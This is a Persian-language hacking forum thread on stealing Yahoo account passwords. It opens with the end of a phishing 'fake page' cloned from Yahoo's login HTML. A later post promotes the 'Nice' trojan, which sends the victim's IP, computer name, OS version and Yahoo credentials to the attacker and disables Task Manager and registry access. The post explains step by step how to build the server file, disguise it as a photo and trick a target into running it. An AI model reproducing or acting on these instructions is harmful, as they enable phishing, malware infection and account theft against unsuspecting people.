    </body>
    </html>
    <script type="text/javascript">
    if (window.yzq_a == null) document.write("<scr" + "ipt type=text/javascript src=http://us.js1.yimg.com/us.yimg.com/lib/bc/bc_1.7.0.js></scr" + "ipt>");
    </script><script type="text/javascript">
    if (window.yzq_a) yzq_a('p', 'P=Y9V54Nhtfzw4KiftQqunBAI12dp4hkKyL78AAb78&T= 13qaurem9%2fX%3d1118973887%2fE%3d150000863%2fR%3dr egst%2fK%3d5%2fV%3d1.1%2fW%3d9%2fY%3dYAHOO%2fF%3d5 98625782%2fS%3d1%2fJ%3d337F6DD8');
    if (window.yzq_gb && window.yzq4) yzq4();
    else if (window.yzq_eh) yzq_eh();
    </script><noscript><img width=1 height=1 alt="" src="http://bc.us.yahoo.com/b?P=Y9V54Nhtfzw4KiftQqunBAI12dp4hkKyL78AAb78&T =140b3dcf5%2fX%3d1118973887%2fE%3d150000863%2fR%3d regst%2fK%3d5%2fV%3d3.1%2fW%3d9%2fY%3dYAHOO%2fF%3d 2056970029%2fQ%3d-1%2fS%3d1%2fJ%3d337F6DD8"></noscript>

    ==============
    FAKE PAGE که می دونی چیه
    یه صفحه که تقریبا شبیه صفحه ای که برای ورود به ایمیل یاهو اقدام می کنی
    بازم میام :idea: :arrow:

  4. #4
    Banned K053_LSH_KV90's Avatar
    تاريخ عضويت
    May 2005
    محل سكونت
    Backdo0rs
    پست ها
    1,407

    پيش فرض

    می دونی فایر وال چیه اگه آره پس دیگه بی خیال هک آیدی
    ============================
    تروجانNice
    ============================
    فرستادن IPطرف مقابل
    فرستادنComputer name
    مشخص کردن نوع ویندوز طرف همراه با ورژن
    فرستادن IDهمراه با پسوورد یاهو شخص مقابل
    از کار انداختنTask manager(یعنی طرف نمی تونه از alt+ctrl+deleteاستفاده کنه)
    طرف نمی تونه به رجیستری از طریق RUNدسترسی پیدا کنه
    تا حالا هم که هیچ آنتی ویروسی نتونسته شناسائیش :lol: کنه
    وقتی هم که تو کامپیوتر طرف اجرا بشه به همین سادگی ها هم پاک نمیشه
    ==============
    شما می تونین این تروجان رو از [ برای مشاهده لینک ، با نام کاربری خود وارد شوید یا ثبت نام کنید ]
    بگیرین
    ===============
    بعد از دانلود از حالت zipخارجش کنین

    بعد به دنبال Nice EditServerبگردید و بازش کنید

    تو قسمت Your Yahoo! Mailآدرس ایمیل خودتون رو بنویسین

    تو قسمت Server File Nameبرایه فایل خودتون اسم انتخاب کنین (اسم رو بدون پسوند بنویسید)

    و سرآخر گزینه ی Saveرو کلیک کنین فایل شما با نامی که براش اتخاب کردین در کنار Nice EditServerظاهر میشه این همون چیزیه که بهش نیاز داریم

    حالا شما یه فایل سرور ساختین که می نونین باهاش خیلی کارا بکنین

    الان تنها کارتون اینه که این فایلی رو که ساختین برای کسی که می خواین هکش کنین بفرستین و اون با کلیک کردن رویه فایل سرور ما هک شه

    حالا چه جوری این فایل رو برای طرف Sendیا ارسال کنیم

    اگه طرفتون از هک چیزی بلد نیست پس خیالتون راحت باشه میشه هکش کرد فقط باید یه خورده رو مخش کار کنین تا اون فایلو بگیره و اجرا کنه (می تونین به عنوان عکس براش بفرستین)

    ولی اگه احتمال می دین طرف متوجه می شه که فایل سرور براش فرستادین سعی و تلاشتون بیهودست چون هیچ وقت نمی گیرتش ولی شما می تونین فایل سرور رو با یه چیزه دیگه مثل عکس خودتون قاطی کنین طوری که اگه طرف فایل رو گرفت متوجه نمیشه که چه خبره چون فقط عکس میبینه ولی آموزش قاطی کردن فایل ها رو دفعه بعد می زارم اسم برنامشم exebinderهست دفعه بعد یه نرم افزار باحال دارم که میزارم بگیرین با این نرم افزار شکلک های مخفی و آشکار یاهو رو راحت می تونین سند کنین و برایه pmهای مشخصی که طرف میده می تونین جواب مشخصی بزارین که اتوماتیک سند شه اسمش هم IR-ymes!هستش که فارسی هم هست
    ==============
    اگه ID کسی رو هک کردی منو خبر کن :mrgreen: :mrgreen:

  5. #5
    اگه نباشه جاش خالی می مونه Unix's Avatar
    تاريخ عضويت
    Jul 2005
    محل سكونت
    هر جا كه مي دانيد و يا نمي دانيد.
    پست ها
    374

    پيش فرض

    خودتون رو خسته نكنيد و يك سري به سايت
    [ برای مشاهده لینک ، با نام کاربری خود وارد شوید یا ثبت نام کنید ]
    بزنيد و از طرفند ها ديدن نماييد نظر هم بدهيد :mrgreen:

  6. #6
    داره خودمونی میشه
    تاريخ عضويت
    May 2005
    پست ها
    81

    پيش فرض

    Oreat White Shark,

    اقا توي پيجي كه html رو نوشتي به جاي شكلك ها نبايد ميل خودمون رو بزاريم

  7. #7
    آخر فروم باز Navid's Avatar
    تاريخ عضويت
    Oct 2004
    پست ها
    3,124

    پيش فرض

    ایم شکلک ها نوشتس و باید معادل اون قرار بگیره . Oreat White Shark جان این پستت رو ویرایش کن و اون متن رو تو کد قرار بده یا تیک " شكلكها در اين نامه غير فعال شوند. " رو بزن

  8. #8
    آخر فروم باز Sajad2006's Avatar
    تاريخ عضويت
    Jul 2005
    محل سكونت
    تهران×/اسمم:سجاد/×
    پست ها
    2,670

    پيش فرض

    ممنون از یونیکس

  9. #9
    حـــــرفـه ای R£ɀД's Avatar
    تاريخ عضويت
    Nov 2004
    پست ها
    2,354

    پيش فرض

    يونيكس جان در مورد اون سايتي كه گفتي بايد بگم كه اصلا بدرد نمي خوره مخصوصا قسمت ترفندهاش كه ترفندهاش دروغ هستن مخصوصا ترفند بدست آوردن پسورد كه نه تنها پسورد را بدست نمياري بلكه پسورد خودت را هم از دست ميدي . يا مثلا ترفند خاموش نشدن كامپيوتر موقع قطع برق.
    ناراحت نشي ها من براي خودت گفتم

  10. #10
    حـــــرفـه ای R£ɀД's Avatar
    تاريخ عضويت
    Nov 2004
    پست ها
    2,354

    پيش فرض

    راستي اينم كد يك fake page
    به جاي [ برای مشاهده لینک ، با نام کاربری خود وارد شوید یا ثبت نام کنید ] ايميل خودتون را بنويسين
    کد:
    برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید

صفحه 1 از 3 123 آخرآخر

Thread Information

Users Browsing this Thread

هم اکنون 1 کاربر در حال مشاهده این تاپیک میباشد. (0 کاربر عضو شده و 1 مهمان)

User Tag List

قوانين ايجاد تاپيک در انجمن

  • شما نمی توانید تاپیک ایحاد کنید
  • شما نمی توانید پاسخی ارسال کنید
  • شما نمی توانید فایل پیوست کنید
  • شما نمی توانید پاسخ خود را ویرایش کنید
  •